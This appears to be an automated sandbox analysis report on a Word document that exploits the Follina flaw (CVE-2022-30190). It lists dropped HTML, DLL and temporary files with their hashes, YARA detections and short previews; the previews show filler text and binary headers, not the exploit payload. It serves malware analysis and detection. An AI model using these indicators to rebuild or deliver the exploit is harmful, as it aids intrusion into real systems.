                                                                                                                                                                      SHA-512:ADBC13FD712E78C10D7401A3993C21ADA9C4C42D163C04A4B81D054608E039C673A2F8EE24FF8AD4EE282682A2457E838BDCE5B97A0A4F8E92F7AEC103B09F60
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:965543. Admin.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\65C14846-0162-44EF-84AC-78ACBBBAB237

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147863
                                                                                                                                                                      Entropy (8bit):5.358966610310439
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:vcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:uHQ9DQW+zIXLI
                                                                                                                                                                      MD5:3A73D6FABDD4916E8429919EC27AB07C
                                                                                                                                                                      SHA1:49258F61785C5789D2CC3EDDD7AA6FBBD3B1CF2E
                                                                                                                                                                      SHA-256:1D23E10FAA3264F10815F43552E770D51DC5AB981D9425299F846BB84A94E7BA
                                                                                                                                                                      SHA-512:06E490B4F04CF98A3FB0E0ABBAC44201249EA2335873C5CA869B45B058DA86145032DA1D75D4D2D4BDF62473FC720E91802FF2482397E33C3A05C08EA0F2E156
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T16:43:58">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, Author: Joe Security
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, Author: Joe Security
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3C56A8FB-78D9-4F9A-8FD2-4C0EF74EE524}.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{51D44AD9-2EC9-4592-AFD3-FEABD139B753}.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2130
                                                                                                                                                                      Entropy (8bit):1.1618571236537212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1SXV5:mbb2sOhYk5vnZA5Rn/YnRn/doQ5
                                                                                                                                                                      MD5:4F8C0EAC84D2D1AEEDABF24EF834DEFF
                                                                                                                                                                      SHA1:7B75446CBB512AD6C13F12A35948E1548FD62864
                                                                                                                                                                      SHA-256:8FB6FE075C6777639474427C864A13E5EAB1ECF7016DD1C23B9CA8FA7A7D0188
                                                                                                                                                                      SHA-512:83839667E41A748A703F80D0CE533F37922433973EFC0949D34D2B3E7FFC8548A04682D97A1457CB7E92C667541EBB2BED0432A59084558A4BBE5E1CE8567494
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Joe Security
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].htm (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9728
                                                                                                                                                                      Entropy (8bit):4.795711592101823
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:bKqedmYoNKvUTCSH3gR8H8FgwSHwBCkwZYPaSJ365OhieMjQZaVRnIjBK:GElNK8TCSfHyPCkwZ+vKO6QZMnh
                                                                                                                                                                      MD5:2370A6D956344C1D6C8057FF7C159EEA
                                                                                                                                                                      SHA1:DDF008F0198B7F3B5B880F0B988EB0E0AB4B5C85
                                                                                                                                                                      SHA-256:DBE39CDBC6172275F0EE9357FFC6965D3C78962E48B10FBC408C6024C06BAA74
                                                                                                                                                                      SHA-512:DF077848EB72011531AE03F81A21BF67BC5090BC1CB13E61E9786FC84475EF277C5FBAD2952240E56A4A81C4C85C8425929675340D31EE2D9529D2C4989F7641
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.0899272142528944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKYak7YnqqfNPN5Dlq5J:+RI+ycuZhNTakSlPNnqX
                                                                                                                                                                      MD5:DFD1C6CD195504FF8BED4DA1D4331733
                                                                                                                                                                      SHA1:3F8CE7D55F3BFBB74F88C3E484E74FBB98C4EFCE
                                                                                                                                                                      SHA-256:64C02655A808B579958C85845F6B5CC32D5DAC367C7CAE900F768E473FEDE8D3
                                                                                                                                                                      SHA-512:9CD30B6AF53ABAC19CE14696B76BBCBA25A99563AE8E344F27A58CA4EE830D0B44820C2F525F817B0C133BDD1FD187D2214B04B3D3099FEFD1619280AA0D1155
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.x.1.g.v.s.r.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.x.1.g.v.s.r.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES51A8.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.086982725229347
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H+C9A++frfLDfHSHhKk1fII+ycuZhNTakSlPNnq9Wd:Mx7yBK0g1ulTa3/q9m
                                                                                                                                                                      MD5:3C5AE55453D17FE4C42EFF9E831D1C6A
                                                                                                                                                                      SHA1:3C38D9EC7E1BF8F33F7DE723EC94C6C4C4A9668B
                                                                                                                                                                      SHA-256:DAD0CE3F8124E585386B2722B176B8540B159ED46CD60377D20652AA398ED217
                                                                                                                                                                      SHA-512:859D881F4235A72973602A9972B059E89074FA252FD007E5E618AFC1405073CB02D0A62B85483D0DF17D8A4A54EFD9130AE6669211DDF3BFC4CDFF38BD3BC492
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP....................U....M..3.3..........4.......C:\Users\user\AppData\Local\Temp\RES51A8.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.x.1.g.v.s.r.0...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES6719.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.093587464240449
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HyC9A++fkZIeDfHPPYhKk1fII+ycuZhNGaakSBrPNnq9Wd:wxkaEqK0g1ulGaa3BBq9m
                                                                                                                                                                      MD5:8E55579AB07AEB8F2CC6172BE73EB95B
                                                                                                                                                                      SHA1:008DE38C2E255E37708CAB0AD03E9B292520F751
                                                                                                                                                                      SHA-256:9A8F5981B57A3B43777265A8CACA9AB49B1BDC6162588F96EC76A1198E31EAB9
                                                                                                                                                                      SHA-512:9CF131C5AA9F834900D5BE0B06CC1E1B21E5C9B0DC5542CE5EC851E47E14B3381B898B34350551CB866FB197DA9B9B596FB9FD154132CD1CEC002C21718CE7E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP...................O[....4P4.4..........4.......C:\Users\user\AppData\Local\Temp\RES6719.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.s.m.b.0.b.c.n...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES7AFF.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.1081012220910935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HfC9A++fsfmJ0DfHJhKk1fII+ycuZhN9nYakSCnNPNnq9Wd:vxxJy3K0g1ul9Ya3CXq9m
                                                                                                                                                                      MD5:760251821DC82C945D9CC94A9D90AEDF
                                                                                                                                                                      SHA1:AEB848353B984F59A036AA42394EECB844E4AC4F
                                                                                                                                                                      SHA-256:21B8260318068179866061B496FFCC2B73764B14B91D68AE019216FF3D6EAFED
                                                                                                                                                                      SHA-512:7BBE4DD3F21CC548618D5B29BD8482F9905F119D59361A0181AD6777DD3BA3D6DC287E31F0FBDFE6C753A3778B8D14F4C8AA57FD8E1B84374792A025DC3BAF5E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP................%q.>..Z "..>............4.......C:\Users\user\AppData\Local\Temp\RES7AFF.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.r.c.f.n.p.c.x...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.09487483477081
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/nYak7YnqqCnNPN5Dlq5J:+RI+ycuZhN9nYakSCnNPNnqX
                                                                                                                                                                      MD5:112571ED3EF7085A2022F9EE3EE8BED5
                                                                                                                                                                      SHA1:EBB8FE3EF10CFD921500633C227D2EA2BFEB9BD9
                                                                                                                                                                      SHA-256:6392D62977025E8CA25BA00EF0AD53B526C862C36B53AFE05502ED144F0C51E2
                                                                                                                                                                      SHA-512:2965DC3B58501929DF53006C845D39E8E9BCB842D63D7DEFB609FEAB328F3323542593DAE181931AAC6378D5CC607568347D626B7C2CB2E376A2AB1FB9028B02
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.r.c.f.n.p.c.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.r.c.f.n.p.c.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3584
                                                                                                                                                                      Entropy (8bit):3.085609000092812
